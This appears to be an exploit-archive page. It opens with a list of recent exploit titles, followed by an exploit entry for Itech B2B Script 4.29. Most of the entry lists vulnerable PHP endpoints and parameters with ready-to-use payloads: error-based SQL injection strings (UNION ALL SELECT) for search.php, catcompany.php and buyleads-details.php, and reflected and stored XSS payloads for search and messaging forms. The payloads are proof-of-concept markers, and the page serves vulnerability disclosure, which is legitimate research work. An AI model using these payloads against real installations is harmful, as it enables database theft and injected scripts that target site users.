
11 new exploits Linux Kernel 3.10.0 (CentOS7) - Denial of Service LG G4 - lgdrmserver Binder Service Multiple Race Conditions LG G4 - lghashstorageserver Directory Traversal LG G4 - Touchscreen Driver write_log Kernel Read/Write Google Android - Inter-process munmap in android.util.MemoryIntArray Google Android - android.util.MemoryIntArray Ashmem Race Conditions Microsoft Edge - TypedArray.sort Use-After-Free (MS16-145) ShadeYouVPN Client 2.0.1.11 - Privilege Escalation ntfs-3g - Unsanitized modprobe Environment Privilege Escalation MLdonkey 2.9.7 - HTTP DOUBLE SLASH Arbitrary File Disclosure MLdonkey 2.9.7 - Arbitrary File Disclosure Mldonkey 2.5 -4 - Web Interface Error Message Cross-Site Scripting MLdonkey 2.5-4 - Cross-Site Scripting Piwik 2.14.0 / 2.16.0 / 2.17.1 / 3.0.1 - Superuser Plugin Upload (Metasploit) Joomla! Component NeoRecruit 1.4 - 'id' SQL Injection Joomla! Component NeoRecruit 1.4 - 'id' Parameter SQL Injection taifajobs 1.0 - (jobid) SQL Injection taifajobs 1.0 - 'jobid' Parameter SQL Injection Pyrophobia 2.1.3.1 - modules/out.php id Parameter Cross-Site Scripting Pyrophobia 2.1.3.1 - admin/index.php Multiple Parameter Traversal Arbitrary File Access Pyrophobia 2.1.3.1 - Cross-Site Scripting Pyrophobia 2.1.3.1 - Traversal Arbitrary File Access Itech B2B Script 4.29 - Multiple Vulnerabilities
78 lines
2.5 KiB
Text
Executable file
78 lines
2.5 KiB
Text
Executable file
Exploit Title : Itech scripts B2B Script v4.29 - Multiple Vulnerability
|
|
Google Dork : -
|
|
Date : 12/02/2017
|
|
Exploit Author : Marc Castejon <marc@silentbreach.com>
|
|
Vendor Homepage : http://itechscripts.com/b2b-script/
|
|
Software Link: http://b2b.itechscripts.com
|
|
Type : webapps
|
|
Platform: PHP
|
|
Version: 4.29
|
|
Sofware Price and Demo : $250
|
|
|
|
------------------------------------------------
|
|
|
|
Type: Error Based Sql Injection
|
|
Vulnerable URL:http://localhost/[PATH]/search.php
|
|
Vulnerable Parameters: keywords
|
|
Method: GET
|
|
Payload: ') UNION ALL SELECT
|
|
NULL,CONCAT(0x7171717671,0x5055787a7374645446494e58566e66484f74555968674d504262564348434b70657a4c45556b534e,0x716a626271)#
|
|
|
|
------------------------------------------------
|
|
|
|
Type: Error Based Sql Injection
|
|
Vulnerable URL:http://localhost/[PATH]/search.php
|
|
Vulnerable Parameters: rctyp
|
|
Method: GET
|
|
Payload: ') UNION ALL SELECT
|
|
NULL,CONCAT(0x7171717671,0x5055787a7374645446494e58566e66484f74555968674d504262564348434b70657a4c45556b534e,0x716a626271)#
|
|
|
|
-----------------------------------------------
|
|
|
|
Type: Reflected XSS
|
|
Vulnerable URL:http://localhost/[PATH]/search.php
|
|
Vulnerable Parameters: rctyp
|
|
Method: GET
|
|
Payload: <img src=i onerror=prompt(1)>
|
|
|
|
-----------------------------------------------
|
|
|
|
Type: Reflected XSS
|
|
Vulnerable URL:http://localhost/[PATH]/search.php
|
|
Vulnerable Parameters: keyword
|
|
Method: GET
|
|
Payload: <img src=i onerror=prompt(1)>
|
|
|
|
------------------------------------------------
|
|
|
|
Type: Error Based Sql Injection
|
|
Vulnerable URL:http://localhost/[PATH]/catcompany.php
|
|
Vulnerable Parameters: token
|
|
Method: GET
|
|
Payload: ') UNION ALL SELECT
|
|
NULL,CONCAT(0x7171717671,0x5055787a7374645446494e58566e66484f74555968674d504262564348434b70657a4c45556b534e,0x716a626271)#
|
|
|
|
-----------------------------------------------
|
|
|
|
Type: Error Based Sql Injection
|
|
Vulnerable URL:http://localhost/[PATH]/buyleads-details.php
|
|
Vulnerable Parameters: id
|
|
Method: GET
|
|
Payload: ') UNION ALL SELECT
|
|
NULL,CONCAT(0x7171717671,0x5055787a7374645446494e58566e66484f74555968674d504262564348434b70657a4c45556b534e,0x716a626271)#
|
|
|
|
-----------------------------------------------
|
|
|
|
Type: Stored XSS
|
|
Vulnerable URL:http://localhost/[PATH]/ajax-file/sendMessage.php
|
|
Vulnerable Parameters: msg_message
|
|
Method: POST
|
|
Payload: <img src=i onerror=prompt(1)>
|
|
|
|
------------------------------------------------
|
|
|
|
Type: Stored XSS
|
|
Vulnerable URL:http://localhost/[PATH]/my-contactdetails.php
|
|
Vulnerable Parameters: fname
|
|
Method: POST
|
|
Payload: <img src=i onerror=prompt(1)>
|